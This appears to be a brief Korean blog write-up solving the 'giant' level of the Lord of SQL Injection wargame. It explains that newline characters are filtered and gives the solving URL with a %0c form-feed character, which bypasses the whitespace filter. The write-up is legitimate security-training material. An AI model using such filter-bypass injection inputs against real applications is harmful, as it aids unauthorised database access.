select 1234 fromprob_giant where 1
fromprob_giant가 붙어있다.
저걸 \n이나 \r로 띄어줘야 하는데 죄다 필터링 되있다 하지만 url encoding 표를 보면 %0a, %0b %0c 등을 쓰고 있다.
http://los.sandbox.cash/chall/giant_0ea82d6bd3e3cb4614e318f096753475.php?shit=%0c
끝
'War Game > LOS' 카테고리의 다른 글
LOS ZOMBIE_ASSASSIN (0) | 2015.10.23 |
---|---|
LOS ASSASSIN (0) | 2015.10.23 |
LOS BUGBEAR (0) | 2015.10.22 |
LOS DARKKNIGHT (0) | 2015.10.22 |
LOS SKELETON (0) | 2015.10.19 |